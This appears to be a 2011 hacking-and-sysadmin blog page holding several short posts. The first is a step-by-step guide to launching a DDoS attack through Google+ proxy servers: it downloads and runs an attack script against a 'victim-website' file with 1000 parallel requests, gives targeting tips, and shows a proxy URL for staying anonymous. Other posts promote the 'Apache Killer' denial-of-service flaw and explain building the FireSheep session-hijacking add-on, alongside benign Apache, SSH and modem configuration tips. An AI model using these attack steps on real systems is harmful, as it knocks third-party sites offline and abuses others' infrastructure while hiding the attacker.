August 2011

Recently we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ Servers can be use for DDoS attack. Lets talk about this ant script, Hey.. but it is worthy šŸ˜€

How DDoS Attack Using Google+ Servers works?

When you post a URL on your Google+ status it fetches URL Summary (It includes Image + Short description) using Google+ Proxy Servers.

Advisory report says;Ā  vulnerable pages are ā€œ/_/sharebox/linkpreview/ā€œ Ā and ā€œgadgets/proxy?ā€œ

So if you send multiple parallel requests with a big number e.g 1000 that can be turn into DDoS attack using Google+ Servers huge bandwidth.

How to use DDoS script to launch a DDoS attack Using Google+ Servers?

Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com

Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh

Make it executable :
chmod u+x ddos.sh

Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000

Now, lets look at this example :
It is recommended to find a full path to some big file which is downloadable without requesting for CAPTCHA.

e.g http://www.victim-website.com/some-file-url/file-name.mp3

NOTE : Make sure your workstation is capable to handle this huge number else your workstation will freeze and you will have to force fully restart your own workstation šŸ˜€

e.g 1000Ā is very big number.

You will see anonymous source instead of Real Source IP:
See sample apache webserver log below

209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"

You can also access it in browser to remain anonymous using below example URL (replace URL with your own choice) :

https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none

If you have any question or unable to run this, Feel free to write us šŸ™‚

Today I was migrating CPanel account to another server using a WHM/Cpanel Utility /scripts/pkgaccount. Package was successfully migrated to a new server and domain was live again on new server. But several functionality of the site was not working and the following error was appearing in apache error log constantly.

symbolic link not allowed or link target not accessible

There are two possibility of this error:

  1. Your apache configuration doesn’t allow to Follow Sym Links.
  2. Your SymLink owner doesn’t match (This usually happens on WHM/CPanel because CPanel uses unique user for unique domain)

Fix ā€œsymbolic link not allowed or link target not accessibleā€ on WHM/CPanel Server :Ā 

Connect to your WHM/CPanel with root privileges from browser e.g http://example.com:2086

Go To

MainĀ >>Ā Service ConfigurationĀ >>Ā Apache ConfigurationĀ >>Ā Global Configuration

Check FollowSymLink

FollowSymLinks

Now, in our example your domain name is hackersgarage.com and your CPanel user is hacker. Simple change ownership of your symlink files to hacker

Jumple to document root of your domain
cd /home/hacker/public_html/

Change ownership
chown hacker:hacker *

If you are still having difficulties or unable to change ownership of files or its just not working.
You can again Go To;

MainĀ >>Ā Service ConfigurationĀ >>Ā Apache ConfigurationĀ >>Ā Global Configuration

Uncheck SymLinksIfOwnerMatch

SymLinksIfOwnerMatch

Save it! It should rebuild Apache configuration and reload httpd daemon.

Fix ā€œsymbolic link not allowed or link target not accessibleā€ on With Control Panel Server (CentOS/Ubuntu/RedHat):

vim /etc/httpd/conf/httpd.conf

Add

Options +FollowSymLinks -SymLinksIfOwnerMatch

Reload httpd
/etc/init.d/httpd reload

on debian base distro;
/etc/init.d/apache gracefull

If you don’t have access to httpd.conf, you can add this in your .htaccess of your document root.
vim .htaccess

Options +FollowSymLinks -SymLinksIfOwnerMatch

Save it! Here you don’t need to reload httpd daemon.

Note :Ā  Using .htaccess method you need to make sure, your httpd.conf is configured/instructed to read .htaccess in your document root.

We have already written a brief How To use worldcall USB on Linux.

To use PTCL Evo device on Linux, follow theĀ  previous HowToĀ  andĀ  update the username/password in /etc/wvdial.conf as follows;

vi /etc/wvdial.conf

Update following;

Username = wcall@worldcall.com
Password = wcall

to

Username = vwireless@ptcl.com
Password = ptcl

and run;

wvdial

DONE!

We were following a thread , it was related to apache flaw which was discovered by KingCope.

What is ‘Apache Killer’ Flaw?

It sends multiple GET requests with dozens of “Byte Ranges” that will eat up server’s memory. Byte Range helps browswer or downloading applications to download required parts of file. This helps reduce bandwidth usage. While this script sends dozen of unsorted components in request header to cause apacheĀ Ā  server to malfunction.

It is DoS condition on Apache web Server. I performed a test with a script written by @KingCope and can confirm that it will eat up Server resource in seconds.

Although the patch isn’t available from apache.org yet, we are still waiting for an update from Apache.

When some one execute this attack on your server, it will eat up your 1 GB RAM in 10 seconds, your CPU load will hit 10 average load and our server will finally freeze. Test it out before Apache release the fix šŸ˜€

[Keep Reading…]

If you ever see your SSH session gets killed, don’t panic šŸ˜€ There is nothing wrong, you need to modify the following directives in your /etc/ssh/sshd_config

vim /etc/ssh/sshd_config

Update these directives :

TCPKeepAlive yes
ClientAliveInterval 30
ClientAliveCountMax 99999

Restart ssh daemon

/etc/init.d/sshd restart

DONE!

What is FireSheep ?

Come on damn.. Its not new! šŸ˜€ Its an old firefox addon. I am explaining it here for how can you use or install it on Linux.

Lets start ;

Taking Checkout from the repository :

git clone https://github.com/codebutler/firesheep.git

Output :

Initialized empty Git repository in /root/firesheep/.git/
remote: Counting objects: 1020, done.
remote: Compressing objects: 100% (605/605), done.
remote: Total 1020 (delta 589), reused 770 (delta 402)
Receiving objects: 100% (1020/1020), 5.48 MiB | 123 KiB/s, done.
Resolving deltas: 100% (589/589), done.

cd firesheep/
git submodule update --init

Output :

Output :Submodule ‘backend/deps/http-parser’ (git://github.com/ry/http-parser.git) registered for path ‘backend/deps/http-parser’
Initialized empty Git repository in /root/firesheep/backend/deps/http-parser/.git/
remote: Counting objects: 815, done.
remote: Compressing objects: 100% (328/328), done.
remote: Total 815 (delta 549), reused 735 (delta 483)
Receiving objects: 100% (815/815), 185.18 KiB | 95 KiB/s, done.
Resolving deltas: 100% (549/549), done.
Submodule path ‘backend/deps/http-parser’: checked out ‘459507f534c807d8ba741730fbc36d4b93b133c1’

Dependencies :

apt-get install libpcap-dev xulrunner-1.9.2-dev libboost-all-dev libtool libhal-dev autoconf

Compilation :

./autogen.sh
make

DONE!

How to Load it into Firefox?

firefox build/firesheep.xpi